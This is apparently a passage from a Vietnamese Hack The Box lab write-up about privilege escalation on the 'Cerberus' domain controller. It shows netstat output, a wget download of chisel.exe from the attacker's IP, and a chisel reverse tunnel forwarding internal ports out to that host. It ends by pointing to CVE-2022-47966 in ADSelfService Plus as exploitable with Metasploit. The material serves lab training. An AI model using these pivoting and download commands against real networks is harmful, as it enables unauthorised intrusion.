Nâng Quyền
Kiểm tra các port đang mở trên win box.
[127.0.0.1]: PS C:\Users\matthew\Desktop> netstat -a
Active Connections
Proto Local Address Foreign Address State
TCP 0.0.0.0:80 DC:0 LISTENING
TCP 0.0.0.0:88 DC:0 LISTENING
TCP 0.0.0.0:135 DC:0 LISTENING
TCP 0.0.0.0:389 DC:0 LISTENING
TCP 0.0.0.0:443 DC:0 LISTENING
TCP 0.0.0.0:445 DC:0 LISTENING
TCP 0.0.0.0:464 DC:0 LISTENING
TCP 0.0.0.0:593 DC:0 LISTENING
TCP 0.0.0.0:636 DC:0 LISTENING
TCP 0.0.0.0:808 DC:0 LISTENING
TCP 0.0.0.0:1500 DC:0 LISTENING
TCP 0.0.0.0:1501 DC:0 LISTENING
TCP 0.0.0.0:2179 DC:0 LISTENING
TCP 0.0.0.0:3268 DC:0 LISTENING
TCP 0.0.0.0:3269 DC:0 LISTENING
TCP 0.0.0.0:5985 DC:0 LISTENING
TCP 0.0.0.0:8888 DC:0 LISTENING
TCP 0.0.0.0:9251 DC:0 LISTENING
TCP 0.0.0.0:9389 DC:0 LISTENING
TCP 0.0.0.0:47001 DC:0 LISTENING
TCP 0.0.0.0:49664 DC:0 LISTENING
TCP 0.0.0.0:49665 DC:0 LISTENING
TCP 0.0.0.0:49666 DC:0 LISTENING
TCP 0.0.0.0:49667 DC:0 LISTENING
TCP 0.0.0.0:49681 DC:0 LISTENING
TCP 0.0.0.0:49682 DC:0 LISTENING
TCP 0.0.0.0:49894 DC:0 LISTENING
TCP 0.0.0.0:49907 DC:0 LISTENING
TCP 0.0.0.0:49918 DC:0
Port forwarding 80, 443, 8888, 9251 và kiểm tra chúng.
PS D:\thehackbox\tool\chisel\win> .\chisel.exe server --port 6666 --reverse
2023/03/29 09:39:35 server: Reverse tunnelling enabled
2023/03/29 09:39:35 server: Fingerprint xABpBJ1+xSi1JTuW+fNUgvtLXvMMc0OlTSedt5ca0OA=
2023/03/29 09:39:35 server: Listening on http://0.0.0.0:6666
2023/03/29 09:39:43 server: session#1: tun: proxy#R:80=>localhost:80: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:443=>localhost:443: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:8888=>localhost:8888: Listening
2023/03/29 09:39:43 server: session#1: tun: proxy#R:9251=>localhost:9251: Listening
#--------------
[127.0.0.1]: PS C:\Users\matthew\desktop> wget http://10.10.**.**/chisel.exe -O chisel.exe
[127.0.0.1]: PS C:\Users\matthew\desktop> ls
Directory: C:\Users\matthew\desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 3/28/2023 7:00 PM 7352320 chisel.exe
-ar--- 3/28/2023 8:22 AM 34 user.txt
[127.0.0.1]: PS C:\Users\matthew\Desktop> ./chisel.exe client 10.10.**.**:6666 R:80:localhost:80 R:443:localhost:443 R:8888:localhost:8888 R:9251:localhost:9251
./chisel.exe : 2023/03/28 19:39:38 client: Connecting to ws://10.10.**.**:6666
+ CategoryInfo : NotSpecified: (2023/03/28 19:3...0.10.**.**:6666:String) [], RemoteException
+ FullyQualifiedErrorId : NativeCommandError
2023/03/28 19:39:42 client: Connected (Latency 484.9877ms)Auto redirect tới website dc.cerberus.local
Đây là website ADSelfService Plus, tìm kiếm vuln về ADSelfService Plus, tôi thấy có thể khai thác được với msf thông qua CVE-2022-47966